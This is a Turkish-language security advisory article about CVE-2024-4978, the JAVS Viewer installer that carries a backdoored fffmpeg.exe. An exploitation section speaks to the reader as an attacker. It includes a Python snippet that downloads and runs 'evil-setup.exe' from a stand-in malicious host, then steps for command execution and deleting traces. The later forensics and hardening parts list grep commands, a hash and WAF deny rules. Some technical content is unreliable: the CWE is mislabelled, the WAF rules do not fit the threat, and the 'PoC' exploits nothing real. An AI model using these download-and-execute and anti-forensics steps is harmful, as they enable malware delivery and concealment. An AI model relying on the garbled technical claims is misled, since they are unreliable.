CVE-2024-4978 · Bilgilendirme

Justice AV Solutions (JAVS) Viewer Installer Embedded Malicious Code Vulnerability

CVE-2024-4978, JAVS Viewer ile kötü amaçlı ffmpeg.exe dosyasının yol açtığı ciddi güvenlik açığı hakkında bilgi edinin.

Üretici
Justice AV Solutions
Ürün
Viewer
Seviye
Orta
Yayın Tarihi
02 Nisan 2026
Okuma
9 dk okuma

CVE-2024-4978: Justice AV Solutions (JAVS) Viewer Installer Embedded Malicious Code Vulnerability

Zorluk Seviyesi: Orta | Kaynak: CISA KEV

Zafiyet Analizi ve Giriş

CVE-2024-4978, Justice AV Solutions (JAVS) Viewer uygulamasında bulunan ciddi bir zafiyettir. Bu zafiyet, izleyici uygulaması için tasarlanmış olan yükleyici içinde gömülü bir kötü amaçlı kod içermektedir. Kötü amaçlı yazılım, ffmpeg.exe adı altında gizlenen fffmpeg.exe dosyasında yer almakta ve çalıştırıldığında kötü niyetli bir komuta ve kontrol (C2) sunucusuna bir arka kapı (backdoor) bağlantısı oluşturmaktadır. Bu durum, sistemi kontrol altına almak için uzaktan kod çalıştırma (RCE) olanağı sağlamaktadır.

Zafiyetin temelinde yer alan hatanın kaynağı, JAVS yükleyicisinde kullanılan ffmpeg kütüphanesinin kötü niyetli bir sürümle değiştirilmiş olmasıdır. ffmpeg, ses ve video dosyalarını işlemek için yaygın olarak kullanılan açık kaynaklı bir kütüphanedir. Bu kütüphane, sıklıkla medya uygulamaları ve multimedya işleme araçları tarafından tercih edilmektedir. Zararlı yazılım geliştiricileri, bu tür popüler kütüphaneleri hedef alarak kullanıcıları daha kolay bir şekilde tuzağa düşürebilmektedirler.

Gerçek dünya senaryolarında, bu tür zafiyetlerin etkisi oldukça geniş kapsamlı olabilir. Özellikle, adalet, güvenlik ve medya gibi sektörlerde faaliyet gösteren kuruluşlar, bu durumdan daha fazla etkilenebilir. Örneğin, bir mahkeme veya savcılık ofisi, JAVS uygumalarının sıkça kullanılmakta olduğu bir ortamda, kurumsal verilerinizi etkileyebilecek bu tür bir zafiyet, hem hukuki hem de operasyonel açıdan ciddi sonuçlar doğurabilir. Ayrıca, adli bilişim (forensics) alanındaki uzmanlar, medya dosyalarını analiz etmek için bu tür uygulamaları kullanırken, aynı zamanda sistemin güvenliğini sağlamakla da yükümlüdürler.

Dünya genelinde, bu tür zafiyetlerin ilgi çekici bir olgusu da, kötü niyetli yazılımların genellikle yalnızca belirli bir hedefe yönelik gerçekleştirilmemesidir. Zafiyetin keşfi sonrasında, dünyanın dört bir yanında bu yazılımların yüzlerce kuruluşa saldırmak için kullanıldığı gözlemlenmiştir. Çoğu zaman, bu tür saldırılar, güvenlik sorunu olan sistemlerin kötüye kullanılmasını hedefler ve büyük veri ihlalleri ile sonuçlanır. Örneğin, bir medya kuruluşunun verilerinin çalınması ya da manipüle edilmesi, kamuoyunu doğrudan etkileyebilecek sonuçlar doğurabilir.

CWE-506 (Incorporation of Functionality from Untrusted Control Sphere), kaynağı güvenilmeyen bir fonksiyonu içermeyi ifade eder. Bu durum, yazılım geliştiricilerin, üçüncü taraf kütüphaneleri kullanırken dikkatli olmalarını ve yazılımlarını sürekli güncelleyerek güvenlik açıklarını kapatmalarını gerektirmektedir. Kötü niyetli yazılımların kullanıcıların sistemlerine sızması, sadece teknik bir sorun değil, aynı zamanda etik bir durumdur. Bu nedenle, White Hat hackerlar olarak, sistemleri proaktif bir şekilde taramak ve analiz etmek, zafiyetleri bulup kapatmak konusunda kritik bir rol oynuyoruz. Administratorlar, özellikle ofislerinde kullanılacak yazılımların kaynaklarını doğrulamaya özen göstermeli ve kötü amaçlı içeriklere karşı sürekli bir tetikte olmalıdırlar.

Sonuç olarak, CVE-2024-4978, sadece bir yazılım problemi olmadığını, aynı zamanda bir sistemin güvenliği ile ilgili daha geniş ölçekli sorunların habercisi olduğunu göstermektedir. Kuruluşların bu tür zafiyetlere karşı daha hazırlıklı olabilmesi için, güvenli yazılım geliştirme yaşam döngüsüne (SDLC) entegre edilmiş güvenlik önlemleri ve sürekli güncellemelerle birlikte, bir güvenlik bilincinin oluşturulması gerekmektedir.

Teknik Sömürü (Exploitation) ve PoC

Justice AV Solutions (JAVS) Viewer installer içindeki kötü niyetli kod, siber güvenlikte ciddi bir tehdit oluşturan bir zafiyettir. Bu zafiyet, özellikle adli bilişim ve güvenlik açısından hassas verilerin işlendiği ortamlarda büyük risk taşır. Bu bölümde, CVE-2024-4978 zafiyetinin teknik sömürüsüne dair adım adım bir rehber sunulacaktır.

Öncelikle, bu tür bir zafiyeti sömürmek için kurban makinenin etkilenmiş bir JAVS Viewer kurulum dosyasını çalıştırması gerekir. Kurulum dosyası, içerisinde kötü niyetli fffmpeg.exe dosyasını barındırır ve bu dosya çalıştırıldığında, arka planda kötü niyetli bir Komut ve Kontrol (C2) sunucusuna bağlanır. Bu bağlanma, saldırganın hedef makinede tam kontrol sağlamasına olanak tanır.

Adım 1: Hedef Sistemi İnceleme

İlk olarak, hedef sistemin işletim sistemi ve kullanılan yazılımlar hakkında bilgi toplayın. Bu bilgileri toplamak için sızma testlerinde yaygın kullanılan araçlardan yararlanabilirsiniz. Örneğin, Nmap (Network Mapper) ile açık portlar ve sürümler hakkında bilgi edinebilirsiniz.

nmap -sV -p- 192.168.1.10

Bu işlemle bağlantı noktalarında hangi servislerin çalıştığını öğrenebilirsiniz. JAVS Viewer sürümünü doğrulamak da bu aşamada önemlidir.

Adım 2: Kötü Amaçlı Dosyayı Dağıtma

Kurulum dosyasını kurban makineye ulaştırmanın birkaç yolu vardır. Bu, phishing saldırıları, sosyal mühendislik, veya güvenlik açıklarından faydalanarak gerçekleştirilebilir. Aşağıda, bu kötü amaçlı dosyanın kurban makineye yüklenmesine sebep olan bir örnek bulunuyor:

import os
import requests

# Kötü amaçlı dosyanın indirileceği URL
url = "http://malicious-server.com/evil-setup.exe"
response = requests.get(url)

# Dosyayı kaydet
with open("javs_installer.exe", "wb") as f:
    f.write(response.content)

# Kurulum dosyasını çalıştır
os.system("javs_installer.exe")

Adım 3: Arka Kapı Bağlantısını Sağlama

Kurulum tamamlandıktan sonra, kötü niyetli fffmpeg.exe dosyası çalıştırıldığında, bu dosya C2 sunucusuna bağlanmaya çalışacaktır. C2 bağlantısının sağlandığından emin olmak için, ağ trafiğini izleyebilirsiniz. Wireshark gibi araçlar kullanarak C2 sunucusuna giden istekleri tespit edebilirsiniz.

sudo tcpdump -i eth0 'tcp port 12345'

Burada, C2 sunucusunun adresini ve bağlantı noktası ayarlarını belirleyin. Zira bu bilgileri elde ettikten sonra, saldırgan olarak sisteme daha fazla etki etme şansınızı artırırsınız.

Adım 4: Zafiyeti Kullanma ve Erişim Sağlama

Arka kapı bağlantısı sağlandığında, saldırganın kurban sistem üzerindeki yetkileri ve erişim seviyeleri açığa çıkar. Bunu örnek bir komut ile gösterebiliriz:

# Hedef sistemde komut çalıştırma
os.system("whoami")

Bu süreç, Remote Code Execution (RCE - Uzaktan Kod Çalıştırma) gibi daha büyük saldırı senaryolarını gerçekleştirmek için bir başlangıç noktasıdır. Yani, kurban makinede erişim sağlamanın ardından, hedef cihazın kontrolünü ele geçirip veri hırsızlığı veya başka kötü niyetli işlemler gerçekleştirebilirsiniz.

Adım 5: İzleri Silme

Son adımda, erişim izlerinizi silmek önemlidir. Bu, geri dönüş yolunu kapatmak için kritik bir süreçtir. Geçici dosyaların, log dosyalarının silinmesi gibi yöntemlerle kendinizi gizli tutabilirsiniz:

os.remove("javs_installer.exe")

Sonuç olarak, CVE-2024-4978 zafiyetinin sömürüsü oldukça tehlikeli sonuçlar doğurabilir ve siber güvenlik alanında dikkatli olunması gereken konular arasında yer almaktadır. White Hat Hacker perspektifiyle bu tür zafiyetleri analiz etmek, sistemleri daha güvenli hale getirme konusunda büyük önem taşır. Saldırganların kullandığı teknikleri anlamak, güvenlik önlemlerinin alınmasında ve zafiyetlerin kapatılmasında kritik rol oynamaktadır.

Forensics (Adli Bilişim) ve Log Analizi

Adli bilişim ve log analizi, bir siber güvenlik olayı sonrası saldırıların ve istismarların belirlenmesi için hayati bir rol oynamaktadır. Özellikle son günlerde gündeme gelen CVE-2024-4978 zafiyeti, Justice AV Solutions (JAVS) Viewer installer içindeki kötü amaçlı kodun nasıl bir tehdit oluşturduğunu gösteriyor. Bu bağlamda, bir siber güvenlik uzmanı olarak, bu tür bir saldırının izlerini nasıl tespit edebileceğinizi ve hangi log dosyalarını analiz etmeniz gerektiğini ele alacağız.

Adli bilişim süreçlerinde, özellikle kötü amaçlı yazılımlar (malware) ve arka kapı bağlantıları (backdoor) gibi tehditleri tespit etmek için detaylı log analizi gerçekleştirilmelidir. CVE-2024-4978 zafiyetinin etkilediği sistemlerde, ilk adım olarak SIEM (Security Information and Event Management) çözümleri kullanılarak güvenlik logları üzerinde inceleme yapılmalıdır. Alternatif olarak, sistem logları (Access log, error log vb.) üzerinde bir analiz gerçekleştirilebilir.

Etkilenen bir sistemde, log dosyalarında gözlemlenmesi gereken belirli imzalar bulunmaktadır. Öncelikle, fffmpeg.exe dosyasının varlığı ve onun SHA256 hash değeri olan 421a4ad2615941b177b6ec4ab5e239c14e62af2ab07c6df1741e2a62223223c4 üzerinden izlenmesi kritik önem taşır. Bu dosyanın çalıştırıldığı anlarda loglara düşen erişim kayıtları (access logs) veya hata logları (error logs), potansiyel bir saldırının habercisi olabilir.

Öncelikle, ilgili log dosyalarında fffmpeg.exe veya benzeri sahte dosya adlarının arama yapılarak tespit edilmesi gerekir. Ayrıca, dosyanın çalıştırılması ile ilgili tarihi ve zamanı kontrol etmek, zaman damgaları (timestamps) açısından önemlidir. Örneğin, DOSYA_AÇILDI veya EXE çalıştırma komutları içeren logların aranması, bu kötü amaçlı dosyanın işletim sisteminde çalıştırılıp çalıştırılmadığını anlamada yardımcı olur.

grep "fffmpeg.exe" access.log
grep "fffmpeg.exe" error.log

Bu komutlar, belirli log dosyalarında fffmpeg.exe anahtar kelimesi ile ilgili kayıtları bulmak için kullanılabilir.

Ayrıca, özellikle belirli IP adreslerine bağlantı kurulduğuna dair kayıtları incelemek de yararlı olacaktır. Malicious C2 (Command and Control) sunucularla bağlantı kurulduğunu gösteren log kayıtları, otomatik araçlar tarafından göz önüne alınabilir:

grep "C2_IP_ADDRESS" access.log

Bu bağlamda, bilinen kötü amaçlı IP'ler üzerinde sorgulama yaparak, sistemin dışarıya bağlı olup olmadığını belirlemek mümkündür. TCP bağlantılarına dair loglar incelenecek olursa, aşağıdaki gibi bir komut faydalı olabilir:

netstat -an | grep "ESTABLISHED"

Son olarak, kötü amaçlı uygulamanın bir arka kapı (backdoor) olarak çalıştığını belirlemede, sistemin beklenmeyen davranışlarına da dikkat etmek gereklidir. Normalde olmayan ağ trafiği, anormal kaynaklardan gelen veri talepleri veya yetkisiz kullanıcı girişimleri, loglarda dikkat çekici izler bırakabilir.

Siber güvenlik uzmanları, bu tür zincirleme analizi yaparak olayın öncesini ve sonrasını detaylı bir şekilde inceleyebilir. Herhangi bir şüpheli etkinlik, derhal daha derinlemesine bir olay incelemesi gerektirir ve en kısa sürede gerekli önlemler alınmalıdır. Adli bilişim ve log analizinin etkin bir şekilde kullanılması, sistemlerin güvenliğini sağlamak ve olası zararın minimize edilmesi için kritik bir süreçtir.

Savunma ve Sıkılaştırma (Hardening)

Son yıllarda siber güvenlik alanında yaşanan gelişmeler, yazılım ve uygulama güvenliğini daha da önemli hale getirmiştir. Özellikle kullanılan yazılımların kurulum dosyalarında yer alan zafiyetler, kötü niyetli kişiler tarafından istismar edilerek kurban sistemlerine hızlı bir şekilde sızılmasına yol açabilmektedir. Bu bağlamda, Justice AV Solutions (JAVS) Viewer installer'da tespit edilen CVE-2024-4978 açıkları, uygulama güvenliği açısından kritik bir tehdit oluşturmaktadır.

Bu zafiyet, kurulum dosyasında yer alan ve aslında zararlı olan fffmpeg.exe dosyasının çalıştırılmasının ardından ortaya çıkan bir arka kapı bağlantısı ile kötü niyetli bir Komuta ve Kontrol (C2) sunucusuna (Command and Control) bağlanmaktadır. Bu durum, kullanılmakta olan cihazların kontrolünü ele geçirmek ve hassas verilere erişmek açısından büyük bir risk taşımaktadır. Bu tür durumları önlemek ve sistemlerinizi güvence altına almak için bir dizi savunma ve sıkılaştırma (hardening) tekniği uygulamak gerekmektedir.

İlk etapta, sistemlerinizi güvence altına almak için güncel güvenlik yamaları ve güncellemeleri uygulamak önemlidir. Yazılım üreticileri, mevcut zafiyetlere karşı güncellemeler yayınlayarak bu açıklardan yararlanılmasını engellemeye çalışmaktadır. Bu nedenle, JAVS Viewer gibi kullanmakta olduğunuz uygulamaların en son sürümünü kullandığınızdan emin olun.

Ayrıca, uygulama sunucularında alternatif bir Web Uygulama Güvenlik Duvarı (WAF) kullanmak, kötü niyetli trafiğin tanımlanması ve engellenmesi açısından faydalı olacaktır. WAF, gelen HTTP isteklerini analiz ederek zararlı aktiviteleri tespit edebilir ve önceden belirlenmiş kurallara göre bu tür istekleri engelleyebilir. Örneğin, aşağıdaki gibi bir kural seti ile belirli dosya uzantıları ve şüpheli HTTP yöntemlerine karşı koruma sağlanabilir:

SecRule REQUEST_HEADERS:User-Agent "malicious-agent" "id:1001,phase:1,deny,status:403"
SecRule REQUEST_FILENAMES "/fffmpeg.exe" "id:1002,phase:1,deny,status:403"
SecRule REQUEST_METHOD "GET" "id:1003,phase:2,log,pass"

Bununla birlikte, sisteminizi sıkılaştırmak için bellek koruma tekniklerini (memory protection) ve uygulama ayrıştırmayı (application isolation) kullanabilirsiniz. Uygulama ayrıştırması, bir sistemde çalışan uygulamaların birbirinden bağımsız bir şekilde çalışmasını sağlayarak, bir uygulama tarafından yapılan herhangi bir kötü niyetli eylemin diğer uygulamaları etkilemesini engeller.

Sunucu güvenliğini artırmak adına, yalnızca gerekli olan portların açık tutulması ve kullanılmayan hizmetlerin kapatılması önerilmektedir. Bunun yanı sıra, dahili ve harici trafiğin izlenmesi için düzenli olarak günlük kayıtlarının (log) kontrol edilmesi, potansiyel tehditlerin erken aşamada tespitini sağlayacaktır.

Son olarak, kullanıcı bilincinin artırılması ve güvenlik eğitimlerinin verilmesi, insan faktörünün oluşturduğu tehditlerin azaltılmasında kritik bir rol oynamaktadır. Kullanıcıların zararlı yazılımlar, kimlik avı saldırıları (phishing) ve diğer sosyal mühendislik teknikleri konusunda bilinçlendirilmesi, organizasyonel güvenlik düzeyini önemli ölçüde yükseltecektir.

Tüm bu önlemler, sistemlerinizi CVE-2024-4978 gibi zafiyetlerden korumak ve genel siber güvenliği artırmak için uygulanabilecek etkili yöntemlerdir. Unutulmaması gereken, güvenlik herhangi bir zaman diliminde sonlanmaz; sürekli bir çaba ve gelişim gerektirir.